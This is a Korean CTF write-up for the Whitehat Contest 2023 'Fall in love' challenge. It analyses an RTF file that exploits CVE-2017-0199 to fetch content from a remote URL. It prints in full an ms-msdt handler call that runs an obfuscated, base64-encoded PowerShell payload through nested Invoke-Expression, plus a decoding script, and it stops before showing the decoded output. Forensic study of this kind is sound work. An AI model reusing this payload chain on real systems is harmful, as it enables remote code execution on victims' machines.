Release: https://github.com/h0meb0dy/CTF/blob/main/Whitehat%20Contest%202023/Fall%20in%20love/for_user.zip
I'm in fall in love to work.
Analysis
$ file fallinlove
fallinlove: Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025RTF 파일이 주어집니다. rtfobj 툴을 이용하여 분석할 수 있습니다.
rtfobj fallinlove
CVE-2017-0199는 악성 OLE object가 삽입된 파일을 열면 원격 서버에서 악성 파일을 다운받아서 원격 코드 실행이 가능한 취약점입니다. 원격 서버의 URL은 https://penxmlformats.org임을 확인할 수 있습니다.
Solve
Windows에서 이 URL로 접속해 보면,
이런 창이 뜨고, 열기를 누르면 콘솔에 다음의 메시지가 뜹니다.
Launched external handler for 'ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression(%27[System.Text.Encoding]%27+[char]58+[char]58+%27Unicode.GetString([System.Convert]%27+[char]58+[char]58+%27FromBase64String(%27+[char]34+%27JgAgACgAIAAkAHAAUwBoAE8AbQBFAFsAMgAxAF0AKwAkAHAAUwBoAE8AbQBlAFsAMwAwAF0AKwAnAHgAJwApACgATgBlAFcALQBPAEIAagBFAGMAdAAgACAASQBvAC4AQwBPAG0AcAByAGUAcwBzAEkATwBOAC4ARABlAEYAbABBAHQARQBzAFQAUgBFAGEAbQAoACAAWwBzAHkAcwBUAGUAbQAuAEkATwAuAE0AZQBtAG8AUgB5AHMAVAByAEUAQQBtAF0AIABbAFMAWQBTAFQAZQBNAC4AYwBvAG4AVgBlAHIAdABdADoAOgBmAHIATwBNAGIAYQBTAGUANgA0AHMAdABSAGkAbgBnACgAIAAnAFQAVgBoAGQAYgA5AHQARwBFAFAAdwByAGUAaQBoAGcARwAyADAARQA2AHkAdAB0AEMAdgBSAGgAWgBWADAAWQBGAGoAawB5AEoAMABkAEIASwBjAE0AUABEAHEAdgBTAEMAaQBXAG4AawBGADEAVABGAHYAcgBqAGUAegB1AHoAUgB4AGQAKwBJAEUAagBkADcAZQAzAEgANwBNAHkAZQBCACsAYwAzAHkAMwA4AGUAbgBuAEsALwBHAGUAYgBGAFoAMwBmADQALwB1AG4AUgBMAFoAKwAzAFYAKwA1AHgANgBHAFgANQBlAEgALwAzADgAZgBiAFgAWAAzAFYATgBFAGQAZQA0AHUATwBiAEoASABjAHAAUABqADUAdgBsAGwALwB4AHEAOAB6AGoAYwB5AC8ATAA2AHcAOQAzAHUAZABwAGgAdABuAHYAWgB1AC8AOQBVAHQAcgA4ADgAdgBiAGsAYQAzAHcAKwBKAHUAdgA3AGsAWQA1AGcALwBQAFoAZQB2AE8AQgB6AGUASABWAFQAeABqAHYAeABsAHUASAAzAFQALwAzADkAZgB1ADgATAB5AHQASABmAFkALwAzAHMAcwB1AG4AbgBIAHQAcgBsAFoATAA5AC8AaAA1AG0AVAA4ADAAVAAyAFgAMgA4AGYAdABjAFAAdAA3AHQAZAB1AFcAVgBGAE4AZgBiADgAeAAvAE8AegAzADUAKwBPADMAMAAzAC8AbgBNADAARwByADMAOQBlAFQAcgA1ADYAMwBJADYAbgBrAHgASABrADYAKwBqAHQANQBlAHoAeQA3AHYAWgBaAEQAcgB6AHoAZgB3AFgAeQBZAEoAOAA2AGUAWgBmAHgARABsAFoAaQBUAHgATAA5AG8AdQBFAEkASgBmAHkAdgB0AEwAdgBuACsAWAA5AFMAZwBxAFoALwB5AEgAdgBhADYAbQA3ACsAVgBMAGMAUwB2ADcAcwA1AGoAdgA1AFUATQB1AG4ASQBPAC8AawBRAHkAZABlADUAQwBnAEwATAArAHMAdwAzADAAcQBHADUANwAxAGsASwAxAGsAMwBNAHAAVgBGAEgAWAArAGYAdAA3AEoAdwBVAGcAYQBaAHkAQwBMAGEANgArAEwANgBlAEsANQB2ADQAagBrAEwAMgBHADgAbAB5ADYAWABRAGYAWAB6AGYAeQBTAEsAKwBkAC8ATgB2AGEAdABjAEgARwBjAG0AaQBqAGUAdgAxAGUAeQBNAFYAegBxAG0AawBhAG0AUwBNAGYAZgBwAGMAaQBIAGkAcwByADYAUwBVACsAUAB2AEMALwBJAGoAcgBvADcAMwA0AFAAYwBoAGEAWgBLAGIAMgAxADAARgBlADEARgA3ADAAcAA5AFAAMQBYAHQAKwBqAFAAZABoAFIALwB4AHMANQBxAFgAKwBsADcAbwB2AHYAOABiAHkAOQBQAG4AMwBIADkAZQB0AEEAdgB5AHUAOABlAC8AVQBUADgAWABtAEwAUAA5AG8ANwA0AGQAeABHAC8AVwBoADAAMwBWAFQAOQBpADMAWgBnAEwANgA2AC8AMQAvAE0ATABuAE4ALwB3AHUAegA0AHQAdgBoAEwAMgB2AGYAbwA3ADEAVAB6AEcAZgBNADMAVQBIAC8AZwBSAHoALwBYAEkAcQB6ADcAVgBIAHYASgA2ADAAdgBoAEsAWABiACsAQQAvADUAMgB1AGoALwBIAHYAVQBBAGYAWQBFADEAMwAzAHcAcgB6AG8ATwAvAEsAeQAxAGYAcABFACsAeABQADYAcAAzAFYAeAArAGoAdgBxADUAQgBGAFgAcgBYAGEAUABpAEsALwBSAC8ATQBFACsAMwBnAHMAOQBQACsANAByADkARAAxAEQASABtAGQANgBuAGsAZAA4ADAAWgA3AHUAegAxAEwAZABXADQAMQBuAHIAUAB0AEwAWQBaADcAaABQACsAcQBTADgATgBMAFgAaQBmADcAcQB1AGMAdwA3ADgAbABFAGgAWAA2AEoAMQBmADAARwBkAFIATwAzAEMAcgB3ADQANAAwACsALwB4AEgAWABWAFcAZgA0AFIAKwBGAEkAcgBYAHUASgA1ADUAZABiAHAALwBaAG4AWAA5AHAAbgA2AGwALwBFAGMAYwBuADkAUQBQADQAQwB2AHUAbwAxAC8AQgA3AE4AUgBhAG4AMQBTAC8ATABlAHIAZgBjAEgAMABCAHUAegBYAHIAawBHAGwAZQB0AEcANQBPADgAegBUAFQANwAyAHYANABGAFMAegBQAHIAZQBMAGgAQgBmAGgAVwAvADkAVgBQAHQAYQBNADQANwBHAGkASABPAEYAOABaAFQAbwBBAGoAOQBJAGMAUABYAEkALwB6ADkAUgB6AFUAUABiAGUANgBDAE4AYwB0AFYAbwBZAFQAMQBHAGMASABIAEQAVABhAFAANgBMAHIAWAA5AFIAZQB6AEUAKwBIAHYARwBtAGYAMABjACsAcAA1AFgAZQBDAGUARQBUAFgAVgA4AHkAYgA5AGkAMwBxAGgAcgBxAE0AawBBAC8ARQBxAC8AMgBvAE8ARwBoADEAUABmAHMASABmAFEATABjADcAUgBFAGYANABxADcAWgBCADUAbgA1AG8ALwBuAEgALwBtAEIAOQA1AHAAbgAzAEgAbQBkAGUAOQB5AEcAUAAzAHYASwBEAGYAdABWAHoATwA3AFYAZgA5AGYAVQB0ADgASgA0AFQATgA2AGgAMwBIAHgAZAB3AFYARABTAHAAMwBoAHAAbgBiAG4ASABDAGYAKwBMAEsAZQBJAFAANQBxAE8AbgAvAG8AagBKADgATwBhADMAWABDAE4ALwBCAFIANABnAFQAOQBlAGIANgBSAG4AOQAvAFEAZAAzAFEAYgA5AGIALwA2AGoALwB5AEEAYgAvAHUATABaADkASAA4AEIATwArAG8ANQA5AFQALwArADUAdAAzAHoAZgBEAEUALwB5AGwASAA5AGEALwA2AHEALwAyAFAANQArAGQAMgBrAFcAZgA5AG4AbABGAFAAbAA2AHMAWABuAHYAeQBpAHUAVQBGACsAWQBPAGQAbAB2AHoAQgAvAFcAdgBEAFEAWQBHACsAVwBSAGwAKwBXAHYAMQArADYAdgBIAE4AZABUAFAARABJAGYAdQBoAFkAZgA3AFIAOQArAGcAVAA4AGwAcgBSAHMATgA2ADkAZgA4AEIAdAAwAEwAegB0AGkAYwBjAFkAbAA1ADQAUABQAHMAUwB6AFoAVAA3ADAAWABlAFAAUgBQAEcAawBlADkAZQBtAHMARAB4AHIARgB3ADgAeQBlAFUANgB2AFQAawBlAHYAVgBmACsARQA1AEcAZgBvAEkALwBGAGgAWQAvAHEARQBYAGkASgB0ADUAWgB0ADAAcgA0ADgATgBBAEgAZwBSAGUAdABSADkAegBxADAALwBkADUAdwAxACsAYQBGAHoAZwBuADUAWABsAHoAZgBWADIAeQBJAHYAUwA5ADEAYwBaAGUAbgAyAGIARwBjACsATwBpAEIAZQB0AFgANgAxACsAZABLAGcANwArAG0AVgBsAFAASQBLADQAWQBZAGQANQB6AHcAMAAvAGoAbgBvAEoAbgBPAGoAdgA4AEcAOQBxAGQAcwBhAEkAQgAzADMAbwByAEUAKwA4ADkAVwBsAEQAMwB0AGQAbgBvAEMANQBDAEgANgBGAHoAYQByAGUAbABuAGkAaQAvAEoASAA0ADIAbgBmAEcAQgA1AC8AaQBPAGYAVgBZAEsANgAwAEEAOABwAGYANwBNAFQAWQBkAFcAcABxAGMAcgB0AFcAdAA2AFIAWgA0AGkAVABoAHYATABBADMAQgArAE0AcAAxAFAAZgBpAFcAZQBHADYATgBlADQAQgBYAFUAMQAvAGcAawA2AGIAWABtAEwAMQBDAGYAaQBkADkANwB4AEIAbgBJAFYANABXAHQAWAB4AHQAZgBlAE4ATQB0ADYASAA2AEcAKwB1AHgANgBuAEMANABjADgAMAAvADkAMwBiADMAeQBnAGUAcQBZADYAWABOAEQAdgBCAFAASABpAGoALwA5AFgAcABHADMANABXAGUAYQBOADAAeQAzAEUAMwA2AFQAagBzAE4AZgAwADIAUABVAGcAZgB6AGQAOAA1AGIAaABCAEwAeABFAC8ANwBhAG0AbAB5AFAAaQBsAHoAeABCAFAAQwBSAGUAcQBFAHcALwBLACsAYQBUAC8ASABXADAATwBXAE4AbgAvAGsAMwBRAEwALwBEAGIANQBnAHYAcQAwAEEAeAB4ADQAaAB6AEYAbgBmAFYASgBSAHoAKwBxAHAAcAA5AEgAZABxAGIAMwBIAGYASwBQACsAUwBUAG8AUAB0AGcAaAB6ADMAbgByADQAMgBEAHIAVQBkAGUAeAA0AHEASABzADgAVwAxAHoAaABPAGsAUABlAEMAVQBEAG4AMAAwAFkATgAvAHUAaABEAE0AUQAvAGUARAByAHAATAAvAHQAdwBSAGoANAAxAC8ASQBOAEgASwB0AE8AeABpAG4ARgBIAGUANQB6AHIASwB2AE0AUABlAGoAaQAxAGYAaAA2AHgAegB0AGEAWABrAHUAWQBBADgAagA3AHEAUwBoADAAOABtAHEANABjAHEAVQBQAFUAYwBXAC8AegBKAHUAcwBUAFQARgBkAGIAbQA5ADkAcQB6AGkAUABaAHkAbgBSAGIAOAA2AE8AOAA0AGEAMgB1AHUAZQBWAGoAeABmAG0AQwAvAFUARgBlAGEALwA1AFgAWAA4ADQAZAB4ADMANAB1AFkAYgArADMATgBoAC8AQQBIAHYARgBWADkAYgBxAEEAKwBRAEwAegBrAG4ANQBYAFgAbABWADcAMwB1AEoAcwAyAFEALwBNAFAAKwBxAEQAdQBWAEQAegBLAGQAUwA1AHcAdQBZAG0AegBoAE8AbwBLADMARQBEAGYAdgBIAGsAUAA5AGIAaAAzAHYAZwBDAGQAZgBQAEMAZgBLAEYAdQAxAEoARQBqADUAeQBUAEwAcwA5AGcANgB3AHoAOQA1AHgAdABsAGMAVwByAC8AeQBlAGMAZAArAEwAdwBKADUAbQAzAHkAUgA5AE0AOAB6AGoAMQBtAGEAOAAyADMAdQBZAHAAMgAvAFcAUgAvAGMARQA0ACsAYwBiADMAbQBQAHEARwAxAHUAcgBqAGcAZgBnAEQAOQA0AGIALwBEADIAcgBJAHcAWAAxADgASwA1AHYAZQB6AHIAUQBaADUAZQBKADcAMABLAGgAZwBQAEQASABlAGUAdAAyAHQAWgBEAHAANwBDAC8AcwByAGsAQgA5AFcAUwA4AE0ALwBLAGsAdgBqAGYARwA2ADIASQA0AEEAQQArAGwALwBKADEATQB6ADcAZQB2AC8ATwBlAE4AbAAyAHEANwBGACsAVABHAGMANwA2AHYASQAvAGkAUQArAGoAdQBpAGYAMQBwAEgANgAvAC8ATQA1AHIAMAAwAEQAeABMADMAVwAvAEkAdgAvAFUAKwA2AFUAMQBqAGYARgBDAGwAdQBNAGQAdwBJADUAeAA3AGMAdwA4AGkASABlADMAdQAvAHAASAA0AG4AdgBWAEUANwAzAG4AUwAwADcAbgBXAEsAKwB1AHQANgBQAGsANwA4AHoAegBqAHoAMQAvAGsAbwB6AGMAYwBkADgAMQAwAEcAMwBzADgASwA0ADkARwBrAEYANwBnAEgAOQBqAHEAYQA5ADcAcABHAHYAQQBXAGIANgA0AFAAeABvAEMATQBlAHEASgA4ADcAaQA3AHMARgB6AHUARwAvAE0AeAB4ADQANAA4ACsAVgB6AGUATwBZAEsAMgBjADIAeAArACsATgBmADAAOQAyADcAMAB6AHoAegB2AFIAMQBqAGsALwB6AFkAVwAzADgATABwAHkAUABsAGYAYwBUAHYAeQBlAGMAMgBwAHgAYQBKAFQAMwBvADIATAA4AEYAOABHAEoAegBHAFAAcABRACsANgBrAHkAZQA0ADMAMQBRADcAQQArAGIAZwB6ADMANABKADkAMABqAHgAdgAzADkAVQBKAGYAMgB0AHgAbwAvAE0AVgA3AFYARwA1ADYAMABGAHAAYwBqAHYATgBGAGYAegA5AHQAcgBPADgAeABsADAAeAAxAFAAZQArAEwATgBYAEcAOAA4AEgAWQAvAHEAdwAxAG4AdwBmAFkATAA3AHkAOQBaADYASABXAFQAYwA0AFkAMwAvAHMAWQBjAGMAcgBLADUAcgBzAFcAOQBPADUARABuADYASgBmAHEARgBIAEYAZAA5AFAAZgBHAGQAQwAvAHAAZQBRAEwAMQBTAGIAeABSAEIATQA1AEYAbgBEAHQAdAAzAGsAYwAvADAASAAvAGUANQA5AEgALwBJADUAcwBmAFcAOQA2AGYAZQBkAC8AcQA3ADAAbAAyAEQAMABqADMAZwA4AHIAMABLAGMAYgA3ADIAOQBuAGcAMwAwAEgAOQB2AGYAaQB5AE8AVAB3ADkAbABXAC8AMABYAHkAaQBIAGoAZgA0AEwAcABjAGcARwBiADEAcgAzAE0AagBnAGYAdgBaAHMATwBoACsAUAB4ADcATwBKAGkAZwBMADkALwBoADQAUAB6AHcAZgBuAE4AOQBkAE4AaAArADUARABkAC8AdgBEAHMARABsAC8ATABSAC8AZgBwAHMASABuAHYARAB1ADcAaABhAG4ATgB4AE0ALwBwAHAAYwB2AHYAagAyAFIAOQBuAGIAMwA3AC8AdgBuADAANABPADcAdgA0AEQAdwA9AD0AJwApACwAIABbAGkATwAuAGMAbwBNAFAAUgBlAFMAUwBpAG8ATgAuAGMAbwBNAHAAcgBFAFMAUwBJAG8AbgBtAE8ARABlAF0AOgA6AGQARQBDAG8AbQBwAFIAZQBTAFMAKQB8ACAARgBPAHIARQBBAGMASAB7ACAATgBlAFcALQBPAEIAagBFAGMAdAAgAEkATwAuAHMAVAByAGUAQQBtAHIARQBBAEQARQBSACgAJABfACwAWwBTAHkAUwB0AEUATQAuAFQAZQBYAHQALgBlAG4AYwBPAGQAaQBOAEcAXQA6ADoAQQBTAGMAaQBJACAAKQB9ACAAKQAuAHIARQBBAEQAVABvAGUAbgBkACgAIAApAA==%27+[char]34+%27))%27))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22'.msdt(Microsoft 지원 진단 도구)가 실행된 기록이 있습니다.
Invoke-Expression은 인자로 전달된 문자열을 명령어로 실행하고 실행 결과를 반환합니다. 두 번 겹쳐서 호출되는데, 먼저 안쪽의 Invoke-Expression()에 전달된 문자열을 해석해 보겠습니다.
# solve.ps1
$cmd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("JgAgACgAIAAkAHAAUwBoAE8AbQBFAFsAMgAxAF0AKwAkAHAAUwBoAE8AbQBlAFsAMwAwAF0AKwAnAHgAJwApACgATgBlAFcALQBPAEIAagBFAGMAdAAgACAASQBvAC4AQwBPAG0AcAByAGUAcwBzAEkATwBOAC4ARABlAEYAbABBAHQARQBzAFQAUgBFAGEAbQAoACAAWwBzAHkAcwBUAGUAbQAuAEkATwAuAE0AZQBtAG8AUgB5AHMAVAByAEUAQQBtAF0AIABbAFMAWQBTAFQAZQBNAC4AYwBvAG4AVgBlAHIAdABdADoAOgBmAHIATwBNAGIAYQBTAGUANgA0AHMAdABSAGkAbgBnACgAIAAnAFQAVgBoAGQAYgA5AHQARwBFAFAAdwByAGUAaQBoAGcARwAyADAARQA2AHkAdAB0AEMAdgBSAGgAWgBWADAAWQBGAGoAawB5AEoAMABkAEIASwBjAE0AUABEAHEAdgBTAEMAaQBXAG4AawBGADEAVABGAHYAcgBqAGUAegB1AHoAUgB4AGQAKwBJAEUAagBkADcAZQAzAEgANwBNAHkAZQBCACsAYwAzAHkAMwA4AGUAbgBuAEsALwBHAGUAYgBGAFoAMwBmADQALwB1AG4AUgBMAFoAKwAzAFYAKwA1AHgANgBHAFgANQBlAEgALwAzADgAZgBiAFgAWAAzAFYATgBFAGQAZQA0AHUATwBiAEoASABjAHAAUABqADUAdgBsAGwALwB4AHEAOAB6AGoAYwB5AC8ATAA2AHcAOQAzAHUAZABwAGgAdABuAHYAWgB1AC8AOQBVAHQAcgA4ADgAdgBiAGsAYQAzAHcAKwBKAHUAdgA3AGsAWQA1AGcALwBQAFoAZQB2AE8AQgB6AGUASABWAFQAeABqAHYAeABsAHUASAAzAFQALwAzADkAZgB1ADgATAB5AHQASABmAFkALwAzAHMAcwB1AG4AbgBIAHQAcgBsAFoATAA5AC8AaAA1AG0AVAA4ADAAVAAyAFgAMgA4AGYAdABjAFAAdAA3AHQAZAB1AFcAVgBGAE4AZgBiADgAeAAvAE8AegAzADUAKwBPADMAMAAzAC8AbgBNADAARwByADMAOQBlAFQAcgA1ADYAMwBJADYAbgBrAHgASABrADYAKwBqAHQANQBlAHoAeQA3AHYAWgBaAEQAcgB6AHoAZgB3AFgAeQBZAEoAOAA2AGUAWgBmAHgARABsAFoAaQBUAHgATAA5AG8AdQBFAEkASgBmAHkAdgB0AEwAdgBuACsAWAA5AFMAZwBxAFoALwB5AEgAdgBhADYAbQA3ACsAVgBMAGMAUwB2ADcAcwA1AGoAdgA1AFUATQB1AG4ASQBPAC8AawBRAHkAZABlADUAQwBnAEwATAArAHMAdwAzADAAcQBHADUANwAxAGsASwAxAGsAMwBNAHAAVgBGAEgAWAArAGYAdAA3AEoAdwBVAGcAYQBaAHkAQwBMAGEANgArAEwANgBlAEsANQB2ADQAagBrAEwAMgBHADgAbAB5ADYAWABRAGYAWAB6AGYAeQBTAEsAKwBkAC8ATgB2AGEAdABjAEgARwBjAG0AaQBqAGUAdgAxAGUAeQBNAFYAegBxAG0AawBhAG0AUwBNAGYAZgBwAGMAaQBIAGkAcwByADYAUwBVACsAUAB2AEMALwBJAGoAcgBvADcAMwA0AFAAYwBoAGEAWgBLAGIAMgAxADAARgBlADEARgA3ADAAcAA5AFAAMQBYAHQAKwBqAFAAZABoAFIALwB4AHMANQBxAFgAKwBsADcAbwB2AHYAOABiAHkAOQBQAG4AMwBIADkAZQB0AEEAdgB5AHUAOABlAC8AVQBUADgAWABtAEwAUAA5AG8ANwA0AGQAeABHAC8AVwBoADAAMwBWAFQAOQBpADMAWgBnAEwANgA2AC8AMQAvAE0ATABuAE4ALwB3AHUAegA0AHQAdgBoAEwAMgB2AGYAbwA3ADEAVAB6AEcAZgBNADMAVQBIAC8AZwBSAHoALwBYAEkAcQB6ADcAVgBIAHYASgA2ADAAdgBoAEsAWABiACsAQQAvADUAMgB1AGoALwBIAHYAVQBBAGYAWQBFADEAMwAzAHcAcgB6AG8ATwAvAEsAeQAxAGYAcABFACsAeABQADYAcAAzAFYAeAArAGoAdgBxADUAQgBGAFgAcgBYAGEAUABpAEsALwBSAC8ATQBFACsAMwBnAHMAOQBQACsANAByADkARAAxAEQASABtAGQANgBuAGsAZAA4ADAAWgA3AHUAegAxAEwAZABXADQAMQBuAHIAUAB0AEwAWQBaADcAaABQACsAcQBTADgATgBMAFgAaQBmADcAcQB1AGMAdwA3ADgAbABFAGgAWAA2AEoAMQBmADAARwBkAFIATwAzAEMAcgB3ADQANAAwACsALwB4AEgAWABWAFcAZgA0AFIAKwBGAEkAcgBYAHUASgA1ADUAZABiAHAALwBaAG4AWAA5AHAAbgA2AGwALwBFAGMAYwBuADkAUQBQADQAQwB2AHUAbwAxAC8AQgA3AE4AUgBhAG4AMQBTAC8ATABlAHIAZgBjAEgAMABCAHUAegBYAHIAawBHAGwAZQB0AEcANQBPADgAegBUAFQANwAyAHYANABGAFMAegBQAHIAZQBMAGgAQgBmAGgAVwAvADkAVgBQAHQAYQBNADQANwBHAGkASABPAEYAOABaAFQAbwBBAGoAOQBJAGMAUABYAEkALwB6ADkAUgB6AFUAUABiAGUANgBDAE4AYwB0AFYAbwBZAFQAMQBHAGMASABIAEQAVABhAFAANgBMAHIAWAA5AFIAZQB6AEUAKwBIAHYARwBtAGYAMABjACsAcAA1AFgAZQBDAGUARQBUAFgAVgA4AHkAYgA5AGkAMwBxAGgAcgBxAE0AawBBAC8ARQBxAC8AMgBvAE8ARwBoADEAUABmAHMASABmAFEATABjADcAUgBFAGYANABxADcAWgBCADUAbgA1AG8ALwBuAEgALwBtAEIAOQA1AHAAbgAzAEgAbQBkAGUAOQB5AEcAUAAzAHYASwBEAGYAdABWAHoATwA3AFYAZgA5AGYAVQB0ADgASgA0AFQATgA2AGgAMwBIAHgAZAB3AFYARABTAHAAMwBoAHAAbgBiAG4ASABDAGYAKwBMAEsAZQBJAFAANQBxAE8AbgAvAG8AagBKADgATwBhADMAWABDAE4ALwBCAFIANABnAFQAOQBlAGIANgBSAG4AOQAvAFEAZAAzAFEAYgA5AGIALwA2AGoALwB5AEEAYgAvAHUATABaADkASAA4AEIATwArAG8ANQA5AFQALwArADUAdAAzAHoAZgBEAEUALwB5AGwASAA5AGEALwA2AHEALwAyAFAANQArAGQAMgBrAFcAZgA5AG4AbABGAFAAbAA2AHMAWABuAHYAeQBpAHUAVQBGACsAWQBPAGQAbAB2AHoAQgAvAFcAdgBEAFEAWQBHACsAVwBSAGwAKwBXAHYAMQArADYAdgBIAE4AZABUAFAARABJAGYAdQBoAFkAZgA3AFIAOQArAGcAVAA4AGwAcgBSAHMATgA2ADkAZgA4AEIAdAAwAEwAegB0AGkAYwBjAFkAbAA1ADQAUABQAHMAUwB6AFoAVAA3ADAAWABlAFAAUgBQAEcAawBlADkAZQBtAHMARAB4AHIARgB3ADgAeQBlAFUANgB2AFQAawBlAHYAVgBmACsARQA1AEcAZgBvAEkALwBGAGgAWQAvAHEARQBYAGkASgB0ADUAWgB0ADAAcgA0ADgATgBBAEgAZwBSAGUAdABSADkAegBxADAALwBkADUAdwAxACsAYQBGAHoAZwBuADUAWABsAHoAZgBWADIAeQBJAHYAUwA5ADEAYwBaAGUAbgAyAGIARwBjACsATwBpAEIAZQB0AFgANgAxACsAZABLAGcANwArAG0AVgBsAFAASQBLADQAWQBZAGQANQB6AHcAMAAvAGoAbgBvAEoAbgBPAGoAdgA4AEcAOQBxAGQAcwBhAEkAQgAzADMAbwByAEUAKwA4ADkAVwBsAEQAMwB0AGQAbgBvAEMANQBDAEgANgBGAHoAYQByAGUAbABuAGkAaQAvAEoASAA0ADIAbgBmAEcAQgA1AC8AaQBPAGYAVgBZAEsANgAwAEEAOABwAGYANwBNAFQAWQBkAFcAcABxAGMAcgB0AFcAdAA2AFIAWgA0AGkAVABoAHYATABBADMAQgArAE0AcAAxAFAAZgBpAFcAZQBHADYATgBlADQAQgBYAFUAMQAvAGcAawA2AGIAWABtAEwAMQBDAGYAaQBkADkANwB4AEIAbgBJAFYANABXAHQAWAB4AHQAZgBlAE4ATQB0ADYASAA2AEcAKwB1AHgANgBuAEMANABjADgAMAAvADkAMwBiADMAeQBnAGUAcQBZADYAWABOAEQAdgBCAFAASABpAGoALwA5AFgAcABHADMANABXAGUAYQBOADAAeQAzAEUAMwA2AFQAagBzAE4AZgAwADIAUABVAGcAZgB6AGQAOAA1AGIAaABCAEwAeABFAC8ANwBhAG0AbAB5AFAAaQBsAHoAeABCAFAAQwBSAGUAcQBFAHcALwBLACsAYQBUAC8ASABXADAATwBXAE4AbgAvAGsAMwBRAEwALwBEAGIANQBnAHYAcQAwAEEAeAB4ADQAaAB6AEYAbgBmAFYASgBSAHoAKwBxAHAAcAA5AEgAZABxAGIAMwBIAGYASwBQACsAUwBUAG8AUAB0AGcAaAB6ADMAbgByADQAMgBEAHIAVQBkAGUAeAA0AHEASABzADgAVwAxAHoAaABPAGsAUABlAEMAVQBEAG4AMAAwAFkATgAvAHUAaABEAE0AUQAvAGUARAByAHAATAAvAHQAdwBSAGoANAAxAC8ASQBOAEgASwB0AE8AeABpAG4ARgBIAGUANQB6AHIASwB2AE0AUABlAGoAaQAxAGYAaAA2AHgAegB0AGEAWABrAHUAWQBBADgAagA3AHEAUwBoADAAOABtAHEANABjAHEAVQBQAFUAYwBXAC8AegBKAHUAcwBUAFQARgBkAGIAbQA5ADkAcQB6AGkAUABaAHkAbgBSAGIAOAA2AE8AOAA0AGEAMgB1AHUAZQBWAGoAeABmAG0AQwAvAFUARgBlAGEALwA1AFgAWAA4ADQAZAB4ADMANAB1AFkAYgArADMATgBoAC8AQQBIAHYARgBWADkAYgBxAEEAKwBRAEwAegBrAG4ANQBYAFgAbABWADcAMwB1AEoAcwAyAFEALwBNAFAAKwBxAEQAdQBWAEQAegBLAGQAUwA1AHcAdQBZAG0AegBoAE8AbwBLADMARQBEAGYAdgBIAGsAUAA5AGIAaAAzAHYAZwBDAGQAZgBQAEMAZgBLAEYAdQAxAEoARQBqADUAeQBUAEwAcwA5AGcANgB3AHoAOQA1AHgAdABsAGMAVwByAC8AeQBlAGMAZAArAEwAdwBKADUAbQAzAHkAUgA5AE0AOAB6AGoAMQBtAGEAOAAyADMAdQBZAHAAMgAvAFcAUgAvAGMARQA0ACsAYwBiADMAbQBQAHEARwAxAHUAcgBqAGcAZgBnAEQAOQA0AGIALwBEADIAcgBJAHcAWAAxADgASwA1AHYAZQB6AHIAUQBaADUAZQBKADcAMABLAGgAZwBQAEQASABlAGUAdAAyAHQAWgBEAHAANwBDAC8AcwByAGsAQgA5AFcAUwA4AE0ALwBLAGsAdgBqAGYARwA2ADIASQA0AEEAQQArAGwALwBKADEATQB6ADcAZQB2AC8ATwBlAE4AbAAyAHEANwBGACsAVABHAGMANwA2AHYASQAvAGkAUQArAGoAdQBpAGYAMQBwAEgANgAvAC8ATQA1AHIAMAAwAEQAeABMADMAVwAvAEkAdgAvAFUAKwA2AFUAMQBqAGYARgBDAGwAdQBNAGQAdwBJADUAeAA3AGMAdwA4AGkASABlADMAdQAvAHAASAA0AG4AdgBWAEUANwAzAG4AUwAwADcAbgBXAEsAKwB1AHQANgBQAGsANwA4AHoAegBqAHoAMQAvAGsAbwB6AGMAYwBkADgAMQAwAEcAMwBzADgASwA0ADkARwBrAEYANwBnAEgAOQBqAHEAYQA5ADcAcABHAHYAQQBXAGIANgA0AFAAeABvAEMATQBlAHEASgA4ADcAaQA3AHMARgB6AHUARwAvAE0AeAB4ADQANAA4ACsAVgB6AGUATwBZAEsAMgBjADIAeAArACsATgBmADAAOQAyADcAMAB6AHoAegB2AFIAMQBqAGsALwB6AFkAVwAzADgATABwAHkAUABsAGYAYwBUAHYAeQBlAGMAMgBwAHgAYQBKAFQAMwBvADIATAA4AEYAOABHAEoAegBHAFAAcABRACsANgBrAHkAZQA0ADMAMQBRADcAQQArAGIAZwB6ADMANABKADkAMABqAHgAdgAzADkAVQBKAGYAMgB0AHgAbwAvAE0AVgA3AFYARwA1ADYAMABGAHAAYwBqAHYATgBGAGYAegA5AHQAcgBPADgAeABsADAAeAAxAFAAZQArAEwATgBYAEcAOAA4AEgAWQAvAHEAdwAxAG4AdwBmAFkATAA3AHkAOQBaADYASABXAFQAYwA0AFkAMwAvAHMAWQBjAGMAcgBLADUAcgBzAFcAOQBPADUARABuADYASgBmAHEARgBIAEYAZAA5AFAAZgBHAGQAQwAvAHAAZQBRAEwAMQBTAGIAeABSAEIATQA1AEYAbgBEAHQAdAAzAGsAYwAvADAASAAvAGUANQA5AEgALwBJADUAcwBmAFcAOQA2AGYAZQBkAC8AcQA3ADAAbAAyAEQAMABqADMAZwA4AHIAMABLAGMAYgA3ADIAOQBuAGcAMwAwAEgAOQB2AGYAaQB5AE8AVAB3ADkAbABXAC8AMABYAHkAaQBIAGoAZgA0AEwAcABjAGcARwBiADEAcgAzAE0AagBnAGYAdgBaAHMATwBoACsAUAB4ADcATwBKAGkAZwBMADkALwBoADQAUAB6AHcAZgBuAE4AOQBkAE4AaAArADUARABkAC8AdgBEAHMARABsAC8ATABSAC8AZgBwAHMASABuAHYARAB1ADcAaABhAG4ATgB4AE0ALwBwAHAAYwB2AHYAagAyAFIAOQBuAGIAMwA3AC8AdgBuADAANABPADcAdgA0AEQAdwA9AD0AJwApACwAIABbAGkATwAuAGMAbwBNAFAAUgBlAFMAUwBpAG8ATgAuAGMAbwBNAHAAcgBFAFMAUwBJAG8AbgBtAE8ARABlAF0AOgA6AGQARQBDAG8AbQBwAFIAZQBTAFMAKQB8ACAARgBPAHIARQBBAGMASAB7ACAATgBlAFcALQBPAEIAagBFAGMAdAAgAEkATwAuAHMAVAByAGUAQQBtAHIARQBBAEQARQBSACgAJABfACwAWwBTAHkAUwB0AEUATQAuAFQAZQBYAHQALgBlAG4AYwBPAGQAaQBOAEcAXQA6ADoAQQBTAGMAaQBJACAAKQB9ACAAKQAuAHIARQBBAEQAVABvAGUAbgBkACgAIAApAA=="))
$cmd로컬에서 실행하면 백신이 악성 콘텐츠로 인식하고 차단합니다. 온라인 PowerShell에서 실행해 보면 다음의 결과를 얻습니다.
